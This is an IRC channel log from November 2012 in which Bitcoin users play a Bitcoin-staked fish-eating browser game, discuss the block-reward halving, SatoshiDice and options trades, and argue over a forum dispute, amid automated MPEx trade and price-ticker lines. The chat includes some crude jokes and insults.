01:23:54 o so you mean users claimed the lines as representing them ? Nov 22 01:24:03 ;;halfreward Nov 22 01:24:03 Estimated time of bitcoin block reward halving: Thu Nov 29 02:24:05 2012 UTC | Time remaining: 1 week, 0 days, 3 hours, and 0 seconds. Nov 22 01:27:33 at this point, theymos could make usagi a forum mod Nov 22 01:27:40 make a back-up first, obviously. Nov 22 01:27:48 https://bitcointalk.org/index.php?topic=127207.msg1350464#msg1350464 <<< huh, so if bitcoin are legal tender anywhere, they are legal tender in poland? Nov 22 01:28:06 then we can celebrate thanksgiving together once the forum is reloaded from the back-up Nov 22 01:29:16 smickles not legal tender. foreign currency. Nov 22 01:29:44 i guess you'll find that most anywhere foreign currency is legally defined as "legal tender of any other country" Nov 22 01:32:56 Bitcoin is not technically legal tender in any country tho. Nov 22 01:33:51 Unless a country makes it legal tender any currency known or unkown... as far as I'm aware, no country has done such thing. Nov 22 01:34:51 indeed. Nov 22 01:35:11 [MPEX] [S.MPOE] 25150 @ 0.0005061 = 12.7284 BTC [-] Nov 22 01:45:05 i replied there, i expect flames over these "third world countries" :P Nov 22 01:47:56 [MPEX] [S.MPOE] 17850 @ 0.0005061 = 9.0339 BTC [-] Nov 22 01:47:58 [MPEX] [S.MPOE] 6650 @ 0.00050563 = 3.3624 BTC [-] Nov 22 01:50:19 what, slovenia ?! Nov 22 01:50:41 a? Nov 22 01:50:58 o i c Nov 22 01:51:10 "maybe except some third world countries with paranoid law system like USA, UK and North Korea" Nov 22 01:51:27 i am of the same mind. the anglosphere is firmly lodged in the third world. Nov 22 01:53:42 [MPEX] [S.MPOE] 4200 @ 0.00050563 = 2.1236 BTC [-] Nov 22 01:53:44 [MPEX] [S.MPOE] 18500 @ 0.00050491 = 9.3408 BTC [-] Nov 22 01:56:57 http://mpex.net/news/archiv/01168.html&usg=ALkJrhhVzd7ayJLxMi3VXLWUbDP_Q-fDHw Nov 22 01:57:07 da fck Nov 22 01:57:32 heh i guess i didn't get that one. Nov 22 01:57:45 idunno¯\(°_o)/¯ Nov 22 02:00:29 [MPEX] [S.MPOE] 10557 @ 0.00050491 = 5.3303 BTC [-] Nov 22 02:10:41 mircea_popescu: I think i've seen that, her real bf from russia comes and fucks him up oslt Nov 22 02:10:56 yup Nov 22 02:15:17 https://bitcointalk.org/index.php?topic=127159.msg1350350 Nov 22 02:15:30 best game ever Nov 22 02:19:14 kakobrekla: come, ally with padre http://the-biggest-fish.appspot.com/# Nov 22 02:20:52 oh sht, i was eaten Nov 22 02:21:02 hm Nov 22 02:21:06 i think it failed in opera Nov 22 02:21:20 let's try thios Nov 22 02:21:26 i'ma be mircea Nov 22 02:22:18 oh, the weight of my fish is now below the threashold Nov 22 02:22:26 How do fishs get eaten? Nov 22 02:22:37 when you attack another fish and lose Nov 22 02:22:43 you can only attack larger fish Nov 22 02:22:59 sux. Nov 22 02:23:09 ah Nov 22 02:23:19 so you always have lower odds to win Nov 22 02:23:25 Is there a way to check odds? Nov 22 02:23:46 when you have a fish, they show below the other fish Nov 22 02:24:04 Nice Nov 22 02:24:22 im too stupid for this Nov 22 02:24:28 dont forget to bookmark the page when it tells you to Nov 22 02:25:02 smickles i haven't. Nov 22 02:25:50 I need to create a bitcoin address for withdrawal first. Nov 22 02:25:54 ;;tslb Nov 22 02:26:02 Time since last block: 12 minutes and 49 seconds Nov 22 02:26:34 i should become visible again at the next block Nov 22 02:26:47 gl padre! Nov 22 02:26:48 how do you ally fishes ? Nov 22 02:27:00 it's the one you choose at the beginning Nov 22 02:27:20 oh wait Nov 22 02:27:22 i dunno Nov 22 02:27:45 lolk Nov 22 02:28:21 ;;tslb Nov 22 02:28:29 Time since last block: 15 minutes and 17 seconds Nov 22 02:28:35 oh, you are green to the people who chose you Nov 22 02:30:17 so how do i chose someone Nov 22 02:31:48 Looks like fun. I'll create a fish. Nov 22 02:31:49 click them Nov 22 02:32:23 I don't see them biting each others tho. Nov 22 02:32:50 ;;tslb Nov 22 02:32:59 Time since last block: 3 minutes and 0 seconds Nov 22 02:45:48 aww rly ? Nov 22 02:45:51 i still show up as 0 Nov 22 02:47:10 whois smickles? Nov 22 02:47:13 Damn, I'm out of personal bitcoins. Nov 22 02:47:15 ObamaEatsBabies? Nov 22 02:47:21 I put them all on MPEx Nov 22 02:47:27 I can't play this. Nov 22 02:48:19 lol Nov 22 02:49:47 i lend food for fishes Nov 22 02:49:50 7% weekly Nov 22 02:50:02 let me in on that Nov 22 02:50:04 kakobrekla : send me 5btc i'll credit your mpex acct ? Nov 22 02:50:24 you will credit it with interests? :) Nov 22 02:51:16 lol nope. Nov 22 02:51:35 im not detecting any eating of fish Nov 22 02:51:37 well gimme addy what are you waiting for Nov 22 02:52:50 [MPEX] [S.MPOE] 10150 @ 0.00050491 = 5.1248 BTC [-] Nov 22 02:53:12 omfg he sold mpex to send me money Nov 22 02:53:27 THIS FISH BUSINESS !!! Nov 22 02:55:25 time to send flowers Nov 22 02:55:35 you'll be sleeping with the fishes, see Nov 22 02:56:29 lol Nov 22 03:00:13 ahaha Nov 22 03:00:19 who's the biggest fish in da pond nao. Nov 22 03:01:54 loool Nov 22 03:02:03 myeah. Nov 22 03:02:28 why you no eat? Nov 22 03:02:53 cause there's nothing worthy in there ? Nov 22 03:03:00 all minnows :D Nov 22 03:03:07 hehe Nov 22 03:03:28 so come on, someone attack Destroyer! Nov 22 03:07:14 [MPEX] [S.MPOE] 10593 @ 0.00050491 = 5.3485 BTC [-] Nov 22 03:11:28 smickles : you should prolly ask for a kickback from whoever made the game. Nov 22 03:17:09 ahaha just owned satoshidice Nov 22 03:25:18 SD is evil Nov 22 03:25:37 but I have found my own strategy and it has worked OK for the last 6 weeks Nov 22 03:27:36 02:26.48 ( &phy ) Are bitcoins kosher? Nov 22 03:27:53 JWU42 this is about http://the-biggest-fish.appspot.com Nov 22 03:37:25 How can you have a strategy for... Nov 22 03:37:34 Something with odds against you... Nov 22 03:37:42 oh shit, mircea's huge! Nov 22 03:38:18 00:47 < dub> whois smickles? << padre Nov 22 03:38:24 yup Nov 22 03:39:48 Hmm, I'm thinking about getting referrals for Sealswithclubs and running freerolls every now and then. Nov 22 03:39:49 smickles I EAT ALLL Nov 22 03:40:22 Hopefully getting some money to good players. Nov 22 03:42:11 who is mpex? Nov 22 03:42:27 Mircea? Nov 22 03:42:49 mircea is mircea and he didnt ask me for more money Nov 22 03:43:02 cause he wouldnt get it! Nov 22 03:44:54 JWU42, how can you run a profit on sd, do explain Nov 22 03:45:22 kakobrekla: you don't think SD is profitable? Nov 22 03:45:54 SD = You always lose in the long run Nov 22 03:46:06 Play long enough and you'll end up in the red. Nov 22 03:46:35 pigeons: do you know anything about rg being gone for days? Nov 22 03:46:41 The more you play, the lower your odds. Nov 22 03:47:01 rg? He's right here. Nov 22 03:47:24 huhwhatnow? i Namjies == rg? Nov 22 03:47:56 lolno Nov 22 03:48:09 /¯(°_o)/¯ Nov 22 03:48:17 /¯(°_o)/¯ Nov 22 03:50:06 kakobrekla: I am up about 250 BTC in the last 6 weeks Nov 22 03:50:06 http://trilema.com/2012/the-biggest-fish-pretty-cool-javascript-game/ Nov 22 03:50:08 ;) Nov 22 03:50:08 dun dun dun Nov 22 03:50:25 kakobrekla i am mircea, mpex and soon dtng Nov 22 03:50:32 slow and steady - trying to win 2 BTC a day Nov 22 03:50:40 JWU42 people run a profit by owning shares. Nov 22 03:50:45 heh Nov 22 03:50:54 yeah - that is probably the wisest way Nov 22 03:51:09 ;;tslb Nov 22 03:51:12 Time since last block: 29 minutes and 15 seconds Nov 22 03:51:18 dude why not a day and a half Nov 22 03:51:43 dammit mircea_popescu, you beat me to the press Nov 22 03:51:55 dun dun duuuunnnn Nov 22 03:52:00 midnightmagic Nov 22 03:52:03 eh Nov 22 03:52:13 mircea_popescu calls up for more players only to earn on them Nov 22 03:52:15 how low! Nov 22 03:52:23 ;> Nov 22 03:52:43 mwahaha Nov 22 03:53:10 01:50 < mircea_popescu> JWU42 people run a profit by owning shares. << http://blog.smickles.com/bitcoin/bitcoin-finance/a-good-month-for-s-dice-shareholders-in-the-making/#update_2_21nov12 Nov 22 03:53:33 ;;bc,rewardhalf Nov 22 03:53:33 Error: "bc,rewardhalf" is not a valid command. Nov 22 03:53:39 ;;halfreward Nov 22 03:53:39 Estimated time of bitcoin block reward halving: Thu Nov 29 02:33:41 2012 UTC | Time remaining: 1 week, 0 days, 0 hours, 40 minutes, and 0 seconds. Nov 22 03:53:41 ;;bc,halfrewaed Nov 22 03:53:42 Error: "bc,halfrewaed" is not a valid command. Nov 22 03:53:45 ty Nov 22 03:54:06 they have had a nice recovery after a sharp drop Nov 22 03:55:01 how does this fish work Nov 22 03:55:11 dub: read mircea_popescu's post Nov 22 03:55:18 http://trilema.com/2012/the-biggest-fish-pretty-cool-javascript-game/ Nov 22 03:55:27 i am actually impressed with the coding quality. Nov 22 03:55:28 or the instructions on the gamesite itself Nov 22 03:55:40 quite elegant imo. Nov 22 03:55:45 [MPEX] [S.MPOE] 10362 @ 0.00050319 = 5.2141 BTC [-] Nov 22 03:55:47 [MPEX] [S.MPOE] 16945 @ 0.00050302 = 8.5237 BTC [-] Nov 22 03:56:09 mircea_popescu: if this gets popular, that dude will be rich Nov 22 03:56:32 possibly, yea. Nov 22 03:56:48 all depends on how well it handles many fish Nov 22 03:56:50 i still dont see the point of it. Nov 22 03:56:59 it's a game? Nov 22 03:57:46 kakobrekla sort of million dollar website with interaction. Nov 22 03:57:46 to what end Nov 22 03:58:29 and ftr i put in 7 btc and i am worth 8 atm, so you could say i made a profit. Nov 22 03:58:59 ;;tslb Nov 22 03:59:05 Time since last block: 37 minutes and 9 seconds Nov 22 03:59:15 so now its a competition who puts more btc in Nov 22 03:59:18 i put 10 Nov 22 03:59:21 you do 20 Nov 22 03:59:22 etc Nov 22 03:59:27 just like inaba and cablepair Nov 22 04:00:02 ;;tslb Nov 22 04:00:07 Time since last block: 38 minutes and 11 seconds Nov 22 04:03:45 kakobrekla yes. Nov 22 04:03:53 just like poker. Nov 22 04:04:10 yeah but your stake == your cards Nov 22 04:04:39 mostly the same with poker. Nov 22 04:04:42 depends what you play. Nov 22 04:04:57 well Nov 22 04:05:03 you set your cards with stake here Nov 22 04:05:04 but in general due to variance, your stake = your cards Nov 22 04:05:06 that is not like poker Nov 22 04:05:18 listen, you get AK this turn, the other guy gets it next turn Nov 22 04:05:25 cards are pretty much = 0 over a long run Nov 22 04:05:47 my point is, i can always get AK if i raise my deposit/stake Nov 22 04:05:58 ya but if you do nothing with it you lose more. Nov 22 04:06:02 think of it like bridge Nov 22 04:06:13 sure, you can have a 4 aces 4 kings 4 queens hand Nov 22 04:06:18 however, if you fail to make the 7nt Nov 22 04:06:24 you will be -x hundreds on the score Nov 22 04:06:44 so in case two guys have 10 and a half million coins each Nov 22 04:06:52 its just a matter of who trustes the site more Nov 22 04:07:00 prolly. Nov 22 04:07:06 stupid game. Nov 22 04:07:22 well im sure its not intended for 10mn coins. Nov 22 04:07:48 ;;tslb Nov 22 04:07:49 but the issue is same Nov 22 04:07:55 Time since last block: 45 minutes and 59 seconds Nov 22 04:07:56 :o Nov 22 04:08:01 i will run out of trust before i ran out of coins Nov 22 04:08:18 so its bullshit Nov 22 04:09:05 well i mean, what do you want, to win it ? Nov 22 04:09:26 is the point of the game to loose it? Nov 22 04:09:37 just to swim around, get a little fatter. Nov 22 04:09:41 have people click your name Nov 22 04:21:45 haha! suckit mircea_popescu Nov 22 04:22:46 nature is amazing. Nov 22 04:23:02 when do you cash out? Nov 22 04:23:45 dub: whenever you want Nov 22 04:23:53 I've already tested it, it works Nov 22 04:26:51 lmao you deposited ? Nov 22 04:27:09 YOU SUCK IT Nov 22 04:27:30 pwned Nov 22 04:28:57 bwashaha i put like 8 btc into this im worth 15 Nov 22 04:29:55 poor smicks Nov 22 04:29:59 when he gets back... Nov 22 04:30:33 [MPEX] [S.MPOE] 8929 @ 0.00050302 = 4.4915 BTC [-] Nov 22 04:30:34 [MPEX] [S.MPOE] 8471 @ 0.00050205 = 4.2529 BTC [-] Nov 22 04:32:07 ok this is odd. do you see mircea as 8.1999 or 10.999 ? Nov 22 04:32:20 former Nov 22 04:33:15 oh shit Nov 22 04:33:20 8.334 now Nov 22 04:33:39 wait, -1.5btc? Nov 22 04:33:39 odd it looked 10.999 for me Nov 22 04:33:40 how? Nov 22 04:33:45 then it dropped to 8.x Nov 22 04:33:49 smickles dtng attacked you Nov 22 04:33:55 its milk. Nov 22 04:34:09 yeah, but i should only be reduced by half each time Nov 22 04:34:16 1.5 is half of 3 neh ? Nov 22 04:34:27 those fishes are fishy Nov 22 04:34:31 and milky. Nov 22 04:35:01 lol y the haet Nov 22 04:35:28 mircea_popescu: _negative_ 1.5 Nov 22 04:35:29 lol coinapult joins the fray Nov 22 04:35:40 smickles i see you as 1.5 ? Nov 22 04:36:05 smicks, attack coinapult! Nov 22 04:36:06 oh, a refresh fixed it Nov 22 04:36:30 ew Nov 22 04:36:36 coinapult wasted me :o Nov 22 04:37:28 WAR Nov 22 04:37:30 Oh NOES Nov 22 04:37:46 fuck yeah! Nov 22 04:37:53 wow wd Nov 22 04:38:06 Ah Nov 22 04:38:12 lol who da fuck did you get ? Nov 22 04:38:23 coinapult and mircea doing battle Nov 22 04:38:55 hahaha Nov 22 04:39:28 lol smickles pwning Nov 22 04:40:30 lol Nov 22 04:40:35 bai bai Nov 22 04:41:25 smickles eats everything :O Nov 22 04:43:16 mircea_popescu: ouch Nov 22 04:43:35 lol Nov 22 04:43:42 well i don't think the game actually works correctly Nov 22 04:43:51 seeing how i was worth ~15 and people added money Nov 22 04:43:55 and now the sum is < 10 Nov 22 04:43:58 well, i profited from that game :) Nov 22 04:44:12 smickles cached out though Nov 22 04:44:18 mircea_popescu: i withdrew monies :) Nov 22 04:44:25 a hehe wd. Nov 22 04:44:28 cash stupid caching in the brain Nov 22 04:44:38 i prolly should have withdrawn, could have made 5 or something like that. Nov 22 04:44:57 so tis bascially SD with pictures Nov 22 04:45:23 Nah... it's about stealing coins off others Nov 22 04:46:51 lol, i'm the last ad left! Nov 22 04:46:52 anyway. was fun lol. Nov 22 04:47:05 smickles you got lucky attacking my top fish Nov 22 04:47:55 what are you guys playing? Nov 22 04:47:55 heh, and coinapult Nov 22 04:48:03 http://the-biggest-fish.appspot.com/# Nov 22 04:48:31 hah Nov 22 04:48:35 this is hilarious Nov 22 04:49:24 Mircea died... Nov 22 04:49:59 Namjies: yeah, he went wild at the end, it was a right frenzy Nov 22 04:50:05 yah. -8btc for me. Nov 22 04:50:09 was fun tho, so. Nov 22 04:50:20 Fun is what matters Nov 22 04:50:45 course 8 btc is something like a dozen blowjobs from a pair of blue eyed identical twins Nov 22 04:50:56 so maybe not REAL fun. but anyway. Nov 22 04:51:48 Romania sounds cheap... Nov 22 04:52:17 teh twins just happen to be slutty Nov 22 05:01:50 please check out our new bitcoin service startup: https://btcjam.com/listings/584 Nov 22 05:03:45 eheh, yeah, I'm aware Nov 22 05:03:58 The rate is too low for me tho Nov 22 05:04:05 Doing other things with my bitcoins. Nov 22 05:05:03 [MPEX] [S.DICE] 42105 @ 0.00339922 = 143.1242 BTC [-] Nov 22 05:05:05 [MPEX] [S.DICE] 7920 @ 0.00339944 = 26.9236 BTC [+] Nov 22 05:08:52 kinda close to zipconf Nov 22 05:14:05 woah Nov 22 05:14:29 only 13571 shares to go until ipo shares are being bought again Nov 22 05:15:14 [MPEX] [S.MPOE] 24392 @ 0.00050395 = 12.2923 BTC [+] Nov 22 05:15:28 Yeah Nov 22 05:22:01 come, give me some karma: http://www.reddit.com/r/Bitcoin/comments/13lpes/the_biggest_fish_a_fun_new_game/ Nov 22 05:25:35 !ticker s.dice Nov 22 05:25:36 or watch jeph jacques draw a comic http://new.livestream.com/accounts/696105/events/885307 Nov 22 05:25:37 [MPEX:S.DICE] 1day: 0.00339922 / 0.00339925 / 0.00339944 (50025 shares, 170.05 BTC), 30day: 0.00180002 / 0.00332456 / 0.0034 (874155 shares, 2,906.19 BTC) Nov 22 05:26:16 [MPEX] [S.MPOE] 22015 @ 0.00050395 = 11.0945 BTC [+] Nov 22 05:26:18 starting to move a little. Nov 22 05:26:20 [MPEX] [S.MPOE] 7620 @ 0.00050698 = 3.8632 BTC [+] Nov 22 05:26:44 mircea_popescu: no doubt, because of my blog Nov 22 05:27:19 ( ̄ω ̄;) Nov 22 05:28:17 http://www.reddit.com/domain/blog.smickles.com/ <<< whoa! who did this? Nov 22 05:28:33 oh, is that automatic? Nov 22 05:28:42 i have no idea Nov 22 05:29:46 http://www.reddit.com/domain/polimedia.us/ i guess it must be automated Nov 22 05:35:21 mircea_popescu: lol http://www.reddit.com/r/Bitcoin/comments/13k4vx/a_message_to_bitcoin_wannabe_scammers/c74vr0q Nov 22 05:36:39 lol Nov 22 05:43:57 haha!, my Biggest Fish add is working! Nov 22 05:46:17 [MPEX] [S.MPOE] 11080 @ 0.00050516 = 5.5972 BTC [-] Nov 22 05:46:18 [MPEX] [S.MPOE] 18600 @ 0.00050407 = 9.3757 BTC [-] Nov 22 05:46:20 [MPEX] [S.MPOE] 6629 @ 0.00050205 = 3.3281 BTC [-] Nov 22 05:46:20 [MPEX] [S.MPOE] 32641 @ 0.00050094 = 16.3512 BTC [-] Nov 22 05:47:04 and at -1082.333333333 CPM so far, it's the best advert i've ever placed Nov 22 05:49:12 [MPEX] [S.MPOE] 10800 @ 0.00050698 = 5.4754 BTC [+] Nov 22 05:56:20 Bah, keep getting disconnected Nov 22 05:56:45 Namjies: my ad has a cpm of -1082~ btc Nov 22 05:56:56 Your what? Nov 22 05:57:03 my ad Nov 22 05:57:06 [MPEX] [S.MPOE] 3147 @ 0.00050698 = 1.5955 BTC [+] Nov 22 05:57:17 where/how/what? Nov 22 05:57:48 You get paid 1082 BTC per CPM to ... advertise? Nov 22 05:58:01 That's how in understand your formulation. Nov 22 05:58:04 http://bit.ly/T5YOFJ Nov 22 05:58:42 heh, it has a CPM of _negative_ 1082 btc ;) Nov 22 05:58:54 ah... Nov 22 05:59:53 I paid 0.60 USD in ads and now have... 0.01 USD in commission on Seals with Clubs! Nov 22 06:00:04 usure smicks ? Nov 22 06:00:04 damn, my fish is about slaughtered Nov 22 06:00:08 awww. Nov 22 06:00:10 or 0.001 BTC Nov 22 06:00:15 oh, mircea_popescu's at it again Nov 22 06:00:25 Seems non-BTC traffic is interested in BTC poker tho... Nov 22 06:00:28 hahaha. this time i just looted. Nov 22 06:00:35 lol, next you know, he'll be selling mpoe share to fund his addiction Nov 22 06:00:59 Addiction is funly addictive! Nov 22 06:01:23 well... unlike last time when i just left my 8 btcs hanging around Nov 22 06:01:26 this time i withdrew Nov 22 06:01:48 aw, my ally bit the dust :( Nov 22 06:04:18 bitch! Nov 22 06:04:33 woah, faucet Nov 22 06:04:58 [MPEX] [S.MPOE] 7550 @ 0.00050309 = 3.7983 BTC [-] Nov 22 06:06:11 ;;tslb Nov 22 06:06:13 Time since last block: 2 minutes and 22 seconds Nov 22 06:07:30 [MPEX] [S.MPOE] 1840 @ 0.00050698 = 0.9328 BTC [+] Nov 22 06:07:31 [MPEX] [S.MPOE] 22300 @ 0.00050846 = 11.3387 BTC [+] Nov 22 06:07:33 [MPEX] [S.MPOE] 7731 @ 0.00050921 = 3.9367 BTC [+] Nov 22 06:09:58 [MPEX] [S.MPOE] 22750 @ 0.00050309 = 11.4453 BTC [-] Nov 22 06:09:59 [MPEX] [S.MPOE] 16490 @ 0.00050094 = 8.2605 BTC [-] Nov 22 06:12:22 so hows the cpm/roi smickles :p Nov 22 06:13:33 heh about a dozen uniques from the fish game, and i'm net +3.147 btc Nov 22 06:14:10 could be worse. Nov 22 06:14:26 yeah, i coul've lost btc overall Nov 22 06:15:00 im like -6 Nov 22 06:15:34 destroyer is back Nov 22 06:15:42 mircea_popescu: do a little highschool probability calc ;) Nov 22 06:16:14 [MPEX] [S.MPOE] 9500 @ 0.0005036 = 4.7842 BTC [+] Nov 22 06:16:15 what you mean ? Nov 22 06:16:15 [MPEX] [S.MPOE] 401 @ 0.00050094 = 0.2009 BTC [-] Nov 22 06:16:17 [MPEX] [S.MPOE] 26279 @ 0.00049988 = 13.1363 BTC [-] Nov 22 06:17:32 i think you best chances are in going after a fish much larger than you, you'll lose more often, but the big win should balance it out Nov 22 06:18:00 seems about neutral. course the game just says "proportional" Nov 22 06:18:19 i want to play Nov 22 06:18:24 i.e., go after the biggest fish there, or if you want it to be a little more fun, go after anything with a 10% or so on it Nov 22 06:18:35 alas places to go whiskey to drink Nov 22 06:20:09 :( no whiskey here Nov 22 06:23:44 Withdrawal request at MPEx pending... Nov 22 06:24:37 ;;ticker Nov 22 06:24:37 BTCUSD ticker | Best bid: 12.05000, Best ask: 12.07797, Bid-ask spread: 0.02797, Last trade: 12.05000, 24 hour volume: 38987.87991628, 24 hour low: 11.64350, 24 hour high: 12.10000, 24 hour vwap: 11.82328 Nov 22 06:24:42 oh Nov 22 06:24:48 Nice. Price up! Nov 22 06:24:50 [MPEX] [S.MPOE] 13900 @ 0.00050921 = 7.078 BTC [+] Nov 22 06:26:52 whoa shoot up to 12 has it Nov 22 06:26:58 yup Nov 22 06:27:14 My Put options will profit greatly it seems Nov 22 06:27:15 we're closing the year over 20 Nov 22 06:27:23 Would be nice. Nov 22 06:27:34 ;;tslb Nov 22 06:27:36 Time since last block: 1 minute and 43 seconds Nov 22 06:27:45 the dude(s) with 40k calls will profit greatly lol Nov 22 06:28:26 yeah, the one who doesn't lose until about 9.50 usd/btc, good call ;) Nov 22 06:28:56 you have that balanced out buy the guy who shorted way more puts tho, right? Nov 22 06:29:13 the ones that turn a profit above 13? Nov 22 06:29:36 smickles short puts don't balance long calls Nov 22 06:29:50 was like ~20k puts iirc Nov 22 06:29:58 yeah, but these are unprofitable puts Nov 22 06:30:04 nope. Nov 22 06:30:11 ij Nov 22 06:30:13 er Nov 22 06:30:14 ok Nov 22 06:30:38 look at graph for O.BTCUSD.P200T for instance Nov 22 06:30:42 sold high rebought low Nov 22 06:30:53 ah Nov 22 06:31:00 [MPEX] [S.MPOE] 10097 @ 0.00050921 = 5.1415 BTC [+] Nov 22 06:31:15 O.BTCUSD.P140T trades 18-27 Nov 22 06:31:19 last trade was 40 Nov 22 06:31:53 I sold P130s for 0.25 BTC each =/ Nov 22 06:32:09 ;;calc 2000 * .13 Nov 22 06:32:10 260 Nov 22 06:32:17 a cool 260 btc just on p140t Nov 22 06:33:09 Assuming it goes over 14 USD/BTC Nov 22 06:34:52 still going apeshit on EskimoBob ? Nov 22 06:35:59 [MPEX] [S.MPOE] 33650 @ 0.00050145 = 16.8738 BTC [-] Nov 22 06:36:00 [MPEX] [S.MPOE] 8450 @ 0.00049988 = 4.224 BTC [-] Nov 22 06:36:35 naw, not really Nov 22 06:36:56 I'm missing claimers too on my list. Nov 22 06:36:57 [MPEX] [S.MPOE] 10036 @ 0.00050921 = 5.1104 BTC [+] Nov 22 06:37:04 Doesn't mean there was false claims. Nov 22 06:37:29 [MPEX] [S.MPOE] 4985 @ 0.00050921 = 2.5384 BTC [+] Nov 22 06:37:30 [MPEX] [S.MPOE] 25765 @ 0.00051 = 13.1402 BTC [+] Nov 22 06:37:50 usagi: did EskimoBob withold a double payment from nef? Nov 22 06:37:59 iirc, he advocated doing that Nov 22 06:38:35 if he filed a claim, and then didn't return a double payment, nef would withold his data from the issuers Nov 22 06:38:54 hell, nef could actually get away with doing that to someone 'just cause' Nov 22 06:39:12 he can't actually Nov 22 06:39:20 unless nef shows his hand Nov 22 06:39:38 because the way the situation is, nef could just be dicking with EskimoBob Nov 22 06:40:25 suppose eb wasn't sent a double payment, and nef said he was Nov 22 06:41:18 I think EB advocated not sending back double payments when it looked like nef would never release the infos Nov 22 06:41:30 but i'm unsure if it was EB or not Nov 22 06:41:56 ;;tslb Nov 22 06:41:58 Time since last block: 16 minutes and 4 seconds Nov 22 06:42:10 [MPEX] [S.MPOE] 28325 @ 0.00051 = 14.4458 BTC [+] Nov 22 06:42:12 ;;ticker Nov 22 06:42:13 BTCUSD ticker | Best bid: 12.05000, Best ask: 12.09951, Bid-ask spread: 0.04951, Last trade: 12.09957, 24 hour volume: 39295.73956024, 24 hour low: 11.64350, 24 hour high: 12.10000, 24 hour vwap: 11.82560 Nov 22 06:42:32 hmm that's delayed. Nov 22 06:42:35 more like 12.15 Nov 22 06:42:36 usagi: it's not a clear case at all, because nefario could claim all sorts of things that eb can't disprove Nov 22 06:43:10 not at all, at the time it was logical to withold those Nov 22 06:43:22 it was the only bargining chip of the issuers Nov 22 06:43:26 ;;ticker --last Nov 22 06:43:27 12.09948 Nov 22 06:43:44 thats right Nov 22 06:43:45 usagi: he might not _still_ be witholding it Nov 22 06:43:54 unless gox engine is fail Nov 22 06:44:08 assuming he ever actually did get a double payment Nov 22 06:44:21 [MPEX] [S.MPOE] 16874 @ 0.00051 = 8.6057 BTC [+] Nov 22 06:44:57 well im off. take care all Nov 22 06:45:00 nn Nov 22 06:45:03 and thanks for all da fishes :D Nov 22 06:46:03 lol nn **** BEGIN LOGGING AT Thu Nov 22 14:15:02 2012 Nov 22 14:24:37 [MPEX] [S.MPOE] 8300 @ 0.00050892 = 4.224 BTC [+] Nov 22 14:28:26 [MPEX] [S.MPOE] 7523 @ 0.00049948 = 3.7576 BTC [-] Nov 22 14:28:28 [MPEX] [S.MPOE] 6895 @ 0.00049733 = 3.4291 BTC [-] Nov 22 14:28:29 [MPEX] [S.MPOE] 19232 @ 0.00049606 = 9.5402 BTC [-] Nov 22 14:35:34 [MPEX] [S.MPOE] 2350 @ 0.00050892 = 1.196 BTC [+] Nov 22 14:35:36 [MPEX] [S.MPOE] 7329 @ 0.00051 = 3.7378 BTC [+] Nov 22 14:43:12 [MPEX] [S.MPOE] 41500 @ 0.00049847 = 20.6865 BTC [-] Nov 22 14:48:16 we having a halving party? Nov 22 14:48:52 i definitely am. Nov 22 14:50:55 please check out our new bitcoin service startup: https://btcjam.com/listings/584 Nov 22 14:51:28 [MPEX] [S.MPOE] 3350 @ 0.00049847 = 1.6699 BTC [-] Nov 22 14:51:29 [MPEX] [S.MPOE] 11250 @ 0.00049606 = 5.5807 BTC [-] Nov 22 14:57:34 [MPEX] [S.MPOE] 12150 @ 0.00049698 = 6.0383 BTC [+] Nov 22 14:59:02 so,little shitbird usagi is opening up multiple scam accusations and when he realizes, he has no proof, closes the thread and makes a new one Nov 22 15:06:58 [MPEX] [S.MPOE] 28350 @ 0.00051 = 14.4585 BTC [+] Nov 22 15:07:37 [MPEX] [S.MPOE] 14600 @ 0.0005062 = 7.3905 BTC [-] Nov 22 15:12:35 [MPEX] [S.MPOE] 19950 @ 0.0005062 = 10.0987 BTC [-] Nov 22 15:16:08 [MPEX] [S.MPOE] 11376 @ 0.0005062 = 5.7585 BTC [-] Nov 22 15:16:41 [MPEX] [S.MPOE] 21024 @ 0.00050085 = 10.5299 BTC [-] Nov 22 15:23:25 [MPEX] [S.MPOE] 7423 @ 0.00050085 = 3.7178 BTC [-] Nov 22 15:23:27 [MPEX] [S.MPOE] 7927 @ 0.00050083 = 3.9701 BTC [-] Nov 22 15:27:18 [MPEX] [S.MPOE] 28515 @ 0.00050391 = 14.369 BTC [+] Nov 22 15:40:00 [MPEX] [S.MPOE] 32050 @ 0.00050083 = 16.0516 BTC [-] Nov 22 15:43:47 [MPEX] [S.MPOE] 10485 @ 0.00050391 = 5.2835 BTC [+] Nov 22 15:43:48 [MPEX] [S.MPOE] 29150 @ 0.00050607 = 14.7519 BTC [+] Nov 22 15:55:57 usagi is saying who is scamming? Nov 22 16:02:20 [MPEX] [S.MPOE] 1737 @ 0.00050884 = 0.8839 BTC [+] Nov 22 16:02:22 [MPEX] [S.MPOE] 27663 @ 0.00050496 = 13.9687 BTC [-] Nov 22 16:07:56 [MPEX] [S.MPOE] 12537 @ 0.00050496 = 6.3307 BTC [-] Nov 22 16:07:57 [MPEX] [S.MPOE] 23463 @ 0.00050343 = 11.812 BTC [-] Nov 22 16:23:07 [MPEX] [S.MPOE] 8900 @ 0.00050343 = 4.4805 BTC [-] Nov 22 16:29:03 [MPEX] [S.MPOE] 2454 @ 0.00050343 = 1.2354 BTC [-] Nov 22 16:29:03 [MPEX] [S.MPOE] 14900 @ 0.00050262 = 7.489 BTC [-] Nov 22 16:29:05 [MPEX] [S.MPOE] 28346 @ 0.00050114 = 14.2053 BTC [-] Nov 22 16:34:01 [MPEX] [S.DICE] 300 @ 0.00339944 = 1.0198 BTC [+] Nov 22 16:51:47 [MPEX] [S.MPOE] 41700 @ 0.00050689 = 21.1373 BTC [+] Nov 22 16:54:27 [MPEX] [S.MPOE] 1555 @ 0.00050689 = 0.7882 BTC [+] Nov 22 16:55:39 [MPEX] [S.MPOE] 38050 @ 0.00050663 = 19.2773 BTC [-] Nov 22 17:03:48 http://www.youtube.com/watch?v=tIwH7ptHCWc Nov 22 17:03:56 [MPEX] [S.MPOE] 10745 @ 0.00050663 = 5.4437 BTC [-] Nov 22 17:03:57 [MPEX] [S.MPOE] 14505 @ 0.00050804 = 7.3691 BTC [+] Nov 22 17:06:18 [MPEX] [S.MPOE] 10150 @ 0.00050804 = 5.1566 BTC [+] Nov 22 17:07:54 [MPEX] [S.MPOE] 22828 @ 0.0005021 = 11.4619 BTC [-] Nov 22 17:07:55 [MPEX] [S.MPOE] 5554 @ 0.00050114 = 2.7833 BTC [-] Nov 22 17:07:57 [MPEX] [S.MPOE] 12634 @ 0.00050083 = 6.3275 BTC [-] Nov 22 17:07:58 [MPEX] [S.MPOE] 14422 @ 0.00050053 = 7.2186 BTC [-] Nov 22 17:11:20 [MPEX] [S.MPOE] 13200 @ 0.00050804 = 